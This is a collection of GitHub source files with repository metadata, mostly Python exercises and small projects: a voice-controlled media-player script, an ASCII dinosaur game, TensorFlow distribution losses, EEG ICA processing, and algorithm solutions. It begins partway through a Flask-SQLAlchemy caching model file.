not k.startswith('__')]\n\n\nclass CachingMeta(DefaultMeta):\n def __init__(cls, *args):\n name, bases, dct = args\n super(CachingMeta, cls).__init__(*args)\n\n if any(itertools.imap(\n lambda x: x != Model and issubclass(x, Model), bases)):\n for k, v in caching_attributes:\n if k not in dct:\n setattr(cls, k, 
v)\n","repo_name":"cohirer2019/Flask-Sqlalchemy-Redica","sub_path":"flask_sqlalchemy_redica/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38200968388","text":"MEASUREMENTS_EXCEED_WORLD_RECORDS_MESSAGE = (\n \"Deve ser menor ou igual ao valor máximo permitido.\"\n)\nWEIGHT_LESS_THAN_OR_EQUAL_TO_ZERO_MESSAGE = \"Peso inválido. Deve ser maior do que zero\"\nINVALID_VALUE_MESSAGE = \"Valor inválido. Apenas números são aceitos\"\nHEIGHT_LESS_THAN_OR_EQUAL_TO_ZERO_MESSAGE = (\n \"Altura inválida. Deve ser maior do que zero\"\n)\nMAX_METRIC_HEIGHT = 2.51\nMAX_METRIC_WEIGHT = 635.0\nMAX_IMPERIAL_HEIGHT = 107\nMAX_IMPERIAL_WEIGHT = 1400\nTYPE_CHOICES = [\"metric\", \"imperial\"]\n","repo_name":"GiuliaMarcela/clean-bmi-calculator","sub_path":"src/common/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636842516","text":"class DVD:\n def __init__(self, name: str, dvd_id: int, creation_year: int, creation_month: str, age_restriction):\n self.is_rented = False\n self.name = name\n self.id = dvd_id\n self.creation_year = creation_year\n self.creation_month = creation_month\n self.age_restriction = age_restriction\n\n @classmethod\n def from_date(cls, dvd_id: int, name: str, date: str, age_restriction: int):\n day, month, year = date.split(\".\")\n return cls(name, dvd_id, int(year), DVD.convert_date(month), age_restriction)\n\n @staticmethod\n def convert_date(month):\n dates = {1: \"January\", 2: \"February\", 3: \"March\", 4: \"April\",\n 5: \"May\", 6: \"June\", 7: \"July\", 8: \"August\",\n 9: \"September\", 10: \"October\", 11: \"November\", 12: \"December\"}\n return dates[int(month)]\n\n def status(self):\n if self.is_rented:\n return \"rented\"\n return \"not rented\"\n\n def __repr__(self):\n return f\"{self.id}: {self.name} ({self.creation_month} {self.creation_year}) has age restriction \" \\\n f\"{self.age_restriction}. 
Status: {self.status()}\"\n\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Python_OOP/Class_and_Static_Methods/Exercises/Movie_World/project/dvd.py","file_name":"dvd.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"21453084885","text":"import collections\n\nclass Solution:\n    def checkInclusion(self, s1: str, s2: str) -> bool:\n        counter1 = collections.Counter(s1)\n        l, r = 0, len(s1)-1\n        counter2 = collections.Counter(s2[l:r])\n        while r < len(s2):\n            counter2[s2[r]] += 1\n            if counter1 == counter2:\n                return True\n            counter2[s2[l]] -= 1\n            if counter2[s2[l]] == 0:\n                del counter2[s2[l]]\n            l += 1\n            r += 1\n        return False\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"567_Permutation_in_String/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2468498650","text":"import sys\nimport os\n\nclass Tofik:\n\t\n\tname = \"Tofik\"\n\t\n\tvoiceOn = True\n\t\n\tcommands = {\n\t\t'voice on': 'turn voice recognition on',\n\t\t'voice off': 'turn voice recognition off' \n\t}\n\t\n\tdef parse(self, word):\n\t\tif word == 'voice on':\n\t\t\tself.voiceOn = True\n\t\telif word == 'voice off':\n\t\t\tself.voiceOn = False\n\nclass Ubuntu:\n\n\tname = \"Ubuntu\"\n\n\tcommands = {\n\t\t'lock screen': 'gnome-screensaver-command -l' \n\t}\n\n\tdef parse(self, word):\n\t\t\n\t\tif word in self.commands:\n\t\t\treturn self.commands[word]\n\nclass Rhythmbox:\n\t\n\tname = \"Rhythmbox\"\n\t\n\tcommands = {\n\t\t\t'play': 'play',\n\t\t\t'pause': 'pause',\n\t\t\t'next': 'next',\n\t\t\t'prev': 'previous',\n\t\t\t'show': 'notify',\n\t\t\t'silence': 'pause',\n\t\t\t'volume up':'volume-up',\n\t\t\t'volume down':'volume-down',\n\t\t\t'print volume':'print-volume'\t\t\t\n\t}\n\t\n\tdef parse(self, word):\n\t\t\t\t\t\n\t\tif word in self.commands:\n\t\t\tnotification = \"notify-send -t 1000 'Rhythmbox COMMAND' ;\".replace('COMMAND', self.commands[word].title())\n\t\t\treturn notification + \" rhythmbox-client --COMMAND\".replace('COMMAND', self.commands[word])\n\nclass Banshee:\n\t\n\tname = \"Banshee\"\n\t\n\tcommands = {\n\t\t\t'play': 'play',\n\t\t\t'pause': 'pause',\n\t\t\t'stop': 'stop',\n\t\t\t'next': 'next',\n\t\t\t'prev': 'previous',\n\t\t\t'silence': 'pause',\n\t}\n\t\n\tdef parse(self, word):\n\t\tif word in self.commands:\n\t\t\treturn 'banshee --no-present --%s %% ' % self.commands[word]\n\nclass CommandAndControl:\n\t\n\tdef __init__(self, file_object):\n\t\t\n\t\tself.ubuntu = Ubuntu();\n\t\tself.tofik = Tofik();\n \n\t\t# Determine which media player to use\n\t\tif os.system('ps xa | grep -v grep | grep banshee >/dev/null') == 0:\n\t\t\tself.mediaplayer = Banshee()\n\t\telif os.system('ps xa | grep -v grep | grep rhythmbox >/dev/null') == 0:\n\t\t\tself.mediaplayer = Rhythmbox()\n\t\telif os.system('which banshee >/dev/null') == 0:\n\t\t\tself.mediaplayer = Banshee()\n\t\t\tos.system('bash -c \"nohup banshee >/dev/null 2>&1 <&1 & disown %%\"')\n\t\telif os.system('which rhythmbox >/dev/null') == 0:\n\t\t\tself.mediaplayer = Rhythmbox()\n\t\telse:\n\t\t\tprint('Couldn\\'t find a supported media player. ' \\\n\t\t\t\t'Please install Rhythmbox or Banshee.')\n\t\t\tsys.exit(1)\n\t\tprint('Taking control of %s media player.' % self.mediaplayer.name)\n\t\t\n\t\tstartstring = 'sentence1: <s> '\n\t\tendstring = ' </s>'\n\t\t\n\t\twhile 1:\n\t\t\tline = file_object.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tif 'missing phones' in line.lower():\n\t\t\t\tprint('Error: Missing phonemes for the used grammar file.')\n\t\t\t\tsys.exit(1)\n\t\t\tif line.startswith(startstring) and line.strip().endswith(endstring):\n\t\t\t\tself.parse(line.strip('\\n')[len(startstring):-len(endstring)])\n\t\n\tdef parse(self, line):\n\t\t# Parse the input\n\t\tparams = [param.lower() for param in line.split() if param]\n\t\tif not '-q' in sys.argv and not '--quiet' in sys.argv:\n\t\t\tprint('Recognized input:', ' '.join(params).capitalize())\n\n\t\t# Execute the command, if recognized/supported\n\t\t# Before any execution check is listening switched on\n\t\tinputText = ' '.join(params)\n\t\t\n\t\tself.tofik.parse(inputText)\n\t\t\t\t\n\t\tif (self.tofik.voiceOn):\n\t\t\tcommand = self.mediaplayer.parse(inputText)\n\t\t\tubuntuCommand = self.ubuntu.parse(inputText)\n\t\t\ttofikCommand = self.tofik.parse(inputText) \t\t\t\n\t\t\tif command:\n\t\t\t\tos.system(\"killall notify-osd; \" + command)\n\t\t\telif ubuntuCommand:\n\t\t\t\tos.system(\"killall notify-osd; \" + ubuntuCommand)\t\t\t\t\n\t\t\telif tofikCommand:\n\t\t\t\tpass\t\t\t\t\n\t\t\t#elif not '-q' in sys.argv and not '--quiet' in sys.argv:\n\t\t\t#\tprint('Command not supported by %s.' % self.mediaplayer.name)\n\t\telse:\n\t\t\tprint(\"Listening is disabled - say 'voice on' to activate Tofik\")\n\nif __name__ == '__main__':\n\ttry:\n\t\tCommandAndControl(sys.stdin)\n\texcept KeyboardInterrupt:\n\t\tsys.exit(1)\n","repo_name":"nisao/tofik","sub_path":"python/tofik.py","file_name":"tofik.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23793037871","text":"\nfrom random import randint\nfrom time import sleep\nimport logging\n\n# delays \nSHORT_DELAY = (30000/1000000.0)\nDELAY = (50000/1000000.0)\nLONG_DELAY = (60000/1000000.0)\n\nground = \"___________________&______.._______________;.,,,_____________________&______.._____________________\"\n\nground_type = [\"____\",\"_&__\",\"__;_\",\"....\"]\nGROUND_FLAT = 0\nGROUND_GRASS = 1\nGROUND_ROCK = 2\nGROUND_BROKEN = 3\nNUM_GND = 4\nG_Y,G_X = 20,2 \n\nCACTI_LEVEL_0 = [\" \",\"# | \",\"#_|_#\",\" | \"]\nCACTI_LEVEL_1 = [\" \",\"#_| #\",\"|_# \",\" | \"]\nCACTI_LEVEL_2 = [\"# | #\",\"#_| #\",\"|_# \",\" | \"]\nCACTI_LEVEL_3 = [\"# | #\",\"# |_#\",\"#_| \",\" | \"]\nCACTI_LEVEL_4 = [\"# | \",\"# | #\",\"#_|_#\",\" | \"]\n\nCACTI_OFFSET = 96\n\nclass Cloud:\n    def __init__(self,window):\n        self.cloud = [\"@@@\",\"..@@@@@....\"]\n        self.image = \"\"\n        self.window = window\n    \n    def draw(self,y,x):\n        sleep(0.01)\n        self.window.addstr(y,x,self.cloud[0])\n        self.window.addstr(y+1,x-3,self.cloud[1])\n    \n    def update(self):\n        n = randint(1,3)\n        for count in xrange(n):\n            y,x = randint(5,10),randint(30,70)\n            self.draw(y,x)\n\nclass Cactus:\n    def __init__(self,window):\n        self.window = window\n    \n    def draw(self,y,x,image):\n        self.window.addstr(y-3,x, image[0])\n        self.window.addstr(y-2,x, image[1])\n        self.window.addstr(y-1,x, image[2])\n        self.window.addstr(y,x, image[3])\n    \n    def update(self,y,x,image):\n        # set cacti level based on game level\n        self.draw(y,x+CACTI_OFFSET,image)\n\nclass Ground:\n    def __init__(self,window):\n        global ground, ground_type\n        self.ground = ground\n        self.window = window\n        self.cactus = []\n    \n    def draw(self,y,x,image):\n        self.window.addstr(y,x,image)\n    \n    def add_cactus(self):\n        self.cactus.append(Cactus(self.window))\n\n    def update(self,level=0,isCactus=False):\n        global SHORT_DELAY, NUM_GND, G_Y, G_X,CACTI_OFFSET\n        # prepare ground using random ground types\n        # these ground types have visual value and \n        # do not change the gameplay in any way\n        image = \"\"\n        gtype_idx = int(randint(0,NUM_GND)%NUM_GND)\n        image = self.ground + ground_type[gtype_idx]\n        self.ground = image[4:98]\n        sleep(SHORT_DELAY)\n        # draw the initial ground \n        self.draw(G_Y,G_X,self.ground)\n\n        # Draw cactus if isCactus flag is true, \n        # this flag is set True after some gametime has elapsed\n        if isCactus:\n            CACTI_OFFSET = (CACTI_OFFSET- 4)\n            if (CACTI_OFFSET <= 0):\n                CACTI_OFFSET = 96\n            \n            c = [CACTI_LEVEL_0,CACTI_LEVEL_1,CACTI_LEVEL_2,CACTI_LEVEL_3,CACTI_LEVEL_4]\n            self.add_cactus()\n            image = c[(level%3)]\n            self.cactus[0].update(20,1,image)\n\n        return [20,1+CACTI_OFFSET]\n\n\n","repo_name":"sukhoi/trex-game","sub_path":"Scene.py","file_name":"Scene.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"12472484972","text":"import random\nnum=random.randint(1,20)\nfor i in range(5):\n    guess=int(input(\"Enter your guess no.(between 1 and 20) : \"))\n    if guess==num:\n        print(f\"You have guessed the correct number i.e {guess}\")\n        break\n    elif guess>num:\n        print(\"Your guess was high, guess lower values\")\n    elif guess<num:\n        print(\"Your guess was low, guess higher values\")\n\nprint(f\"The correct answer was {num}\")\n\n    \n","repo_name":"Access7-s/Python-Exercise","sub_path":"Python exercises Beginners/randomnumberguess.py","file_name":"randomnumberguess.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9914475143","text":"# Ex_9\r\n\r\n# declaration of number\r\nnumbers=[1,2,3,4,5,6,7]\r\n# result list\r\nres=[]\r\n# loop through the numbers \r\nfor i in numbers:\r\n    # calculate square and add to the result list\r\n    res.append(i * i)\r\nprint(res)\r\n\r\n\r\n\r\n# output\r\n\r\n\r\n# [1, 4, 9, 16, 25, 36, 49]","repo_name":"kalaiselvam-ganesan/Python_programs","sub_path":"Ex_9.py","file_name":"Ex_9.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25985030169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDistribution functions\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom network.graphtils import repeat\n#from network.layers import fully_connected\n\ndef get_number_output_parameters(hps):\n    ''' returns the number of necessary output distribution parameters '''\n    if hps.output == 'deterministic':\n        return 1\n    elif hps.output == 'gaussian':\n        return 2\n    elif hps.output == 'categorical':\n        return hps.n_bins\n    elif hps.output == 'mog':\n        return hps.n_mix * 3\n\ndef kl_divergence(mu1,sigma1,mu2,sigma2):\n    ''' kl divergence for two univariate gaussians '''\n    return tf.log(sigma2/sigma1) + (tf.square(sigma1) + tf.square(mu1 - mu2))/(2*tf.square(sigma2)) - 0.5\n\ndef gaussian_ce(mu1,sigma1,mu2,sigma2):\n    ''' crossentropy H(q(mu1,sigma1),p(mu2,sigma2)) '''\n    return tf.log(2*np.pi*tf.square(sigma2))/2 + (tf.square(sigma1) + tf.square(mu1 - mu2))/(2*tf.square(sigma2))\n\ndef one_kl(mu1,sigma1,mu2,sigma2):\n    return 0.5 * tf.log(np.pi*2 * tf.square(sigma2)) + (tf.square(sigma1) + tf.square(mu1 - 
mu2))/(2*tf.square(sigma2))\n\ndef bhattacharyya_distance(mu1,sigma1,mu2,sigma2):\n ''' bhattacharyya distance for two univariate gaussians '''\n return (tf.square(mu1-mu2)/(tf.square(sigma1) + tf.square(sigma2)))/4.0 + tf.log((tf.square(sigma1)/tf.square(sigma2) + tf.square(sigma2)/tf.square(sigma1) + 2.0)/4.0)/4.0\n\ndef hellinger_distance(mu1,sigma1,mu2,sigma2):\n ''' hellinger distance for two univariate gaussians '''\n return 1.0 - tf.sqrt(2*sigma1*sigma2/(tf.square(sigma1)+tf.square(sigma2))) * tf.exp(-0.25 * tf.square(mu1-mu2)/(tf.square(sigma1)+tf.square(sigma2)))\n\ndef output_distribution(z,hps,p_dropout,seed,kl,k):\n ''' Specifies losses and sampling operations for top graph layer '''\n if hps.output == 'deterministic':\n # params\n mu = z\n param = mu\n #dist\n mean = mu\n sample = mu\n # loss\n y = y_rep = tf.placeholder(\"float32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k)\n error = tf.reduce_sum(tf.square(mu - y_rep),axis=1)\n loss = tf.reduce_mean(error) + kl\n #loss = tf.losses.mean_squared_error(mu,y) + kl\n \n elif hps.output == 'gaussian':\n # params\n mu = z[:,0][:,None]\n log_sigma = z[:,1][:,None] + hps.sd_output_bias\n #sigma = tf.exp(log_sigma)\n sigma = tf.nn.softplus(log_sigma) \n # dist\n outdist = tf.contrib.distributions.Normal(mu,sigma)\n sample = outdist.sample()\n mean = mu\n param = tf.concat([mu,sigma],axis=1)\n \n # loss \n if hps.loss == 'analytic':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,2],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n y_dist = tf.contrib.distributions.Normal(y_rep[:,0][:,None],y_rep[:,1][:,None])\n if hps.distance == 'kl':\n #kl_output = tf.contrib.distributions.kl_divergence(outdist,y_dist)\n kl_output = tf.contrib.distributions.kl_divergence(y_dist,outdist)\n #kl_output = kl_divergence(y[:,0],y[:,1],mu,sigma) # this should be the correct one? 
\n #kl_output = kl_divergence(mu,sigma,y[:,0],y[:,1])\n #kl_output = one_kl(y[:,0],y[:,1],mu,sigma)\n #kl_output = one_kl(mu,sigma,y[:,0],y[:,1])\n elif hps.distance == 'bhat':\n kl_output = bhattacharyya_distance(mu,sigma,y_rep[:,0],y_rep[:,1])\n elif hps.distance == 'hel':\n kl_output = hellinger_distance(mu,sigma,y_rep[:,0],y_rep[:,1])\n elif hps.distance == 'ce':\n kl_output = y_dist.cross_entropy(outdist)\n #kl_output = gaussian_ce(mu,sigma,y_rep[:,0],y_rep[:,1])\n error = tf.reduce_sum(kl_output,axis=1)\n loss = tf.reduce_mean(error) + kl\n elif hps.loss == 'sample':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n error = -1.0 * outdist.log_prob(y_rep)\n loss = tf.reduce_mean(error) + kl\n \n elif hps.output == 'categorical':\n # params\n logits = z\n param = tf.nn.softmax(logits)\n # dist\n outdist = tf.contrib.distributions.Categorical(logits=logits)\n sample = tf.reshape(outdist.sample(1),[-1,1])\n mean = None\n\n # loss \n if hps.loss == 'analytic':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,hps.n_bins],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n #loss = -tf.reduce_sum(y * tf.log(param),axis=1)\n #loss = tf.reduce_mean(loss) + kl\n error = tf.nn.softmax_cross_entropy_with_logits(labels=y_rep,logits=logits)\n loss = tf.reduce_mean(error) + kl\n elif hps.loss == 'sample':\n y = y_rep = tf.placeholder(\"int32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n error = -1.0 * tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y_rep,logits=tf.expand_dims(logits,1))\n loss = tf.reduce_mean(error) + kl\n\n elif hps.output == 'mog':\n # params\n logits = z[:,:hps.n_mix]\n pi = tf.nn.softmax(logits)\n mu_p = z[:,hps.n_mix:(2*hps.n_mix)]\n bias = tf.tile(tf.constant(np.arange(hps.n_mix)-int(hps.n_mix/2),dtype='float32')[None,:],[tf.shape(mu_p)[0],1])\n mu_p = mu_p + bias \n\n log_sigma = z[:,(2*hps.n_mix):(3*hps.n_mix)] + hps.sd_output_bias\n sigma_p = tf.nn.softplus(log_sigma) \n param = tf.concat([pi,mu_p,sigma_p],axis=1)\n\n # dist\n p_dist = tf.contrib.distributions.Categorical(probs=pi)\n n_dist = []\n for i in range(hps.n_mix):\n n_dist.append(tf.contrib.distributions.Normal(mu_p[:,i],sigma_p[:,i])) \n outdist = tf.contrib.distributions.Mixture(cat=p_dist,components=n_dist)\n sample = tf.reshape(outdist.sample(1),[-1,1])\n mean = outdist.mean()[:,None]\n\n # construct loss \n if hps.loss == 'analytic':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,hps.n_mix*3],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n qi,mu_q,sigma_q = tf.split(y_rep,3,axis=1)\n error = l2loss_gmm(pi,mu_p,sigma_p,qi,mu_q,sigma_q,hps.n_mix)\n loss = tf.reduce_mean(error) + kl\n elif hps.loss == 'sample':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n error = -1.0 * outdist.log_prob(y_rep)\n loss = tf.reduce_mean(error) + kl\n \n return y,error,loss,sample,mean,param\n\ndef l2loss_gmm(pi,mu_p,sigma_p,qi,mu_q,sigma_q,n_mix):\n ''' Calculate L2 distance between two Gaussian mixture p(y) and q(y) '''\n piqi = tf.concat([pi,-1.0*qi],axis=1)\n s_pq = tf.concat([sigma_p,sigma_q],axis=1)\n mu_pq = tf.concat([mu_p,mu_q],axis=1)\n p_matrix = tf.einsum('ai,aj->aij',piqi,piqi) # outer product\n s_matrix = tf.tile(tf.expand_dims(s_pq,-1),[1,1,n_mix*2]) + tf.tile(tf.expand_dims(s_pq,1),[1,n_mix*2,1])\n distr = tf.contrib.distributions.Normal(loc = tf.tile(tf.expand_dims(mu_pq,1),[1,n_mix*2,1]), scale = s_matrix)\n pdfs 
= distr.prob(tf.tile(tf.expand_dims(mu_pq,-1),[1,1,n_mix*2]))\n return tf.reduce_sum(p_matrix * pdfs,axis=[1,2])\n\n#def kl_gmm(pi,mu_p,sigma_p,qi,mu_q,sigma_q,n_mix):\n# ''' Sfikas et al, 2005 '''\n# V = 1.0/(1.0/sigma_p + 1.0/sigma_q)\n\nclass TransformDiscrete():\n ''' Transform categorical variable between integer values and true bins '''\n \n def __init__(self,n=51,min_val=-10,max_val=10):\n self.n = n\n self.min_val = min_val\n self.max_val = max_val\n self.edges = np.linspace(min_val,max_val,n+1)\n self.plot_edges = np.linspace(min_val,max_val,n+1)\n self.means = (self.edges[:-1] + self.edges[1:])/2\n self.edges[0] = -np.Inf\n self.edges[-1] = np.Inf\n self.bin_width = (max_val - min_val)/n\n\n def to_index(self,value):\n ''' from list of values to list of bin indices '''\n if type(value) == float:\n value = [value]\n return np.array([np.where(val>self.edges)[0][-1] for val in value])\n\n def to_value(self,indices):\n ''' from list of bin indices to list of values '''\n if type(indices) == int:\n indices = [indices]\n try: \n return np.array([self.means[index] for index in indices])\n except:\n raise ValueError('bin index probably too large') \n\ndef gaussian_diag_logps(mean, logvar, sample=None):\n if sample is None:\n noise = tf.random_normal(tf.shape(mean))\n sample = mean + tf.exp(0.5 * logvar) * noise\n return tf.clip_by_value(-0.5 * (np.log(2 * np.pi) + logvar + tf.square(sample - mean) / tf.exp(logvar)),-(10e10),10e10)\n \nclass DiagonalGaussian(object):\n def __init__(self, mean, logvar, sample=None):\n self.mean = mean\n self.logvar = logvar\n\n if sample is None:\n noise = tf.random_normal(tf.shape(mean))\n sample = mean + tf.exp(0.5 * logvar) * noise\n self.sample = sample\n\n def logps(self, sample):\n return gaussian_diag_logps(self.mean, self.logvar, sample)\n","repo_name":"tmoer/return_distribution_exploration","sub_path":"network/distributions.py","file_name":"distributions.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35748186001","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\ndr = [(0,1),(0,-1),(1,0),(-1,0)]\n\nn = int(input())\nvis1 = [[0 for _ in range(n)] for _ in range(n)]\nvis2 = [[0 for _ in range(n)] for _ in range(n)]\n\ndef bfs(y,x,vis,color,flag = False):\n q = deque([(y,x)])\n vis[y][x] = 1\n color_pool = []\n if flag:\n if color == 'R' or color == 'G':\n color_pool = ['R','G']\n else:\n color_pool = ['B']\n else:\n color_pool = [color]\n while q:\n curr_y,curr_x = q.popleft()\n for dy,dx in dr:\n ny = dy + curr_y\n nx = dx + curr_x\n if (0 <= ny < n and 0 <= nx < n) and not vis[ny][nx] and arr[ny][nx] in color_pool:\n q.append((ny,nx))\n vis[ny][nx] = 1\narr = []\nfor _ in range(n):\n row = list(input().strip())\n arr.append(row)\n\ncount1 = 0\nfor r in range(n):\n for c in range(n):\n if not vis1[r][c]:\n color = arr[r][c]\n count1 += 1\n bfs(r,c,vis1,color)\n\ncount2 = 0\nfor r in range(n):\n for c in range(n):\n if not vis2[r][c]:\n color = arr[r][c]\n count2 += 1\n bfs(r,c,vis2,color,True)\n\nprint(count1,count2)\n","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/10027_적록색약.py","file_name":"10027_적록색약.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18108895672","text":"import numpy as np\nimport pandas as pd\nimport mne\nfrom mne import create_info\nfrom mne.channels import read_montage\nfrom 
mne.io import RawArray\nimport csv\nfrom PIL import Image\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nplt.ioff()\nmatplotlib.rcParams.update({'figure.max_open_warning': 0})\n\n\ndef load_raw_eeg(filename):\n    data = pd.read_csv(filename)\n    ch_names = list(data.columns[1:])\n\n    data = 1e-7 * np.array(data[ch_names]).T\n    ch_types = ['eeg'] * len(ch_names)\n    montage = read_montage('standard_1020', ch_names)\n\n    ch_locations = []\n    for i in range(len(ch_names)):\n        ch_name = ch_names[i]\n        ch_location = montage.pos[i]\n        ch_locations.append([ch_name, ch_location[0], ch_location[1], ch_location[2]])\n\n    info = create_info(ch_names, sfreq=512, ch_types=ch_types, montage=montage)\n\n    return RawArray(data, info, verbose=False), ch_locations\n\n\ndef get_ica_weights_map(ica):\n    components = list(range(ica.n_components_))\n    maps = np.dot(ica.mixing_matrix_[:, components].T,\n                  ica.pca_components_[:ica.n_components_])\n    return maps\n\n\ndef writecsv(data, filename):\n    with open(filename, 'w', newline='') as csv_file:\n        writer = csv.writer(csv_file, delimiter='\\t')\n        for data_row in data:\n            writer.writerow(data_row)\n\n\ndef process_eeg(data_filename, locations_filename, ica_weights_filename, plot_filenames):\n    raw, ch_locations = load_raw_eeg(data_filename)\n    writecsv(ch_locations, locations_filename)\n\n    ch_number = len(raw.ch_names)\n\n    ica = mne.preprocessing.ICA(n_components=ch_number)\n    ica.fit(raw)\n\n    for i in range(ch_number):\n        plot_to_save = ica.plot_components(i, show=False)\n        plot_filename = plot_filenames[i]\n        plot_filenames.append(plot_filename)\n        plot_to_save.savefig(plot_filename)\n\n        # cropping images\n        plot_to_save = Image.open(plot_filename)\n        plot_to_save = plot_to_save.crop((25, 56, 205, 232))\n        plot_to_save.save(plot_filename)\n\n    weights_map = get_ica_weights_map(ica)\n    np.savetxt(ica_weights_filename, weights_map, delimiter=', ')\n\n    plt.close('all')\n","repo_name":"Evgenius2020/icaMark","sub_path":"labeling/process_eeg.py","file_name":"process_eeg.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71980425768","text":"#BEGIN /* Algoritmo Genetico Simple */\r\n#\tGenerar una poblacion inicial.\r\n#\tComputar la funcion de evaluacion de cada individuo\r\n#\tWHILE NOT Terminado DO\r\n#\tBEGIN /* Producir nueva generacion */\r\n#\t\tFOR Tamaño poblacion/2 DO \r\n#\t\tBEGIN /* Ciclo Reproductivo */\r\n#\t\t\tSeleccionar dos individuos de la anterior generacion, para el cruce (probabilidad de seleccion proporcional a la funcion de evaluacion del individuo).\r\n#\t\t\tCruzar con cierta probabilidad los dos individuos obteniendo dos descendientes.\r\n#\t\t\tMutar los dos descendientes con cierta probabilidad\r\n#\t\t\tComputar la funcion de evaluacion de los dos descendientes mutados.\r\n#\t\t\tInsertar los dos descendientes mutados en la nueva generacion.\r\n#\t\tEND\r\n#\t\tIF la poblacion ha convergido THEN \r\n#\t\t\tTerminado := TRUE\r\n#\tEND\r\n#END\r\nfrom clases.claseGenetico import *\r\n\r\ndef controlProfesores():\r\n\tentrada = open(\"entradas/profesores.csv\",'r')\r\n\tprofesores = entrada.readline()\r\n\tvectorProfesores = profesores.split(\"\\n\")\r\n\tnombreAsignaturas = vectorProfesores[0].split(\";\")\r\n\tdel nombreAsignaturas[0]\r\n\tdel vectorProfesores[0]\r\n\r\n\tdocentes = []\r\n\tvectorProfesores.pop()\r\n\tfor i in vectorProfesores:\r\n\t\tauxProfesores = i.split(\";\")\r\n\t\twhile('' in auxProfesores):\r\n\t\t\tauxProfesores.remove('')\r\n\t\tnombreProfesores = auxProfesores[0]\r\n\tentrada.close()\r\n\r\n\r\ndef receptorGenetico(listaGrados):\r\n\tgrados=[]\r\n\tgrados = listaGrados\r\n\tinicializador(grados)\r\n\r\ndef inicializador(grados):\r\n\tprint(\"iniciando el Algoritmo\")\r\n\tgeneracion = [\"1_generacion\",\"2_generacion\",\"3_generacion\",\"4_generacion\",\"5_generacion\"]\r\n\tindiceGrado=0\r\n\tfor i in grados:\r\n\t\tprint(\"Algoritmo para el Grado: \" + i)\r\n\t\tindiceGrado = indiceGrado + 1\r\n\t\tfor j in generacion: \r\n\t\t\tcrearPoblacion(i,j,indiceGrado)\r\n\t\t\tprint(\"la \" + j + \" ha sido añadida para el grado: \" + i)\r\n\r\n\t#controlProfesores()","repo_name":"aliriox/HPC","sub_path":"Proyecto HPC/algoritmoGenetico.py","file_name":"algoritmoGenetico.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"43000027882","text":"# names = input(\"Enter names separated by commas: \").title().split(\",\")\n# assignments = input(\"Enter assignment counts separated by commas: \").split(\",\")\n# grades = input(\"Enter grades separated by commas: \").split(\",\")\n#\n#\n# message = \"Hi {},\\n\\nThis is a reminder that you have {} assignments left to \\\n# submit before you can graduate. Your current grade is {} and can increase \\\n# to {} if you submit all assignments before the due date.\\n\\n\"\n#\n# for name, assignment, grade in zip(names, assignments, grades):\n#     print(message.format(name, assignment, grade, int(grade) + int(assignment)*2))\n#####################################################################################################\n# result = 0\n# while(result == 0):\n#     try:\n#         num1= int(input(\"Enter First Input : \"))\n#         num2= int(input(\"Enter Second Input : \"))\n#         result = num1 / num2\n#         print(result)\n#\n#     except ValueError:\n#         print(\"You Entered incorrect input You have to Enter a Number data type\")\n#     except ZeroDivisionError:\n#         print(\"You Shouldn't divide by ZERO\")\n#     print(\"Continue \")\n######################################################################################\n\nf = open('saud.txt', 'w')\nf.write(\"This is an additional txt\")\nf.close()\n\nf = open('a.txt', 'r')\nfile_data = f.read()\nf.close()\nprint(file_data)\n##############################################################################################\n","repo_name":"Ahmedtarekpage/Python_Course","sub_path":"Day 5.py","file_name":"Day 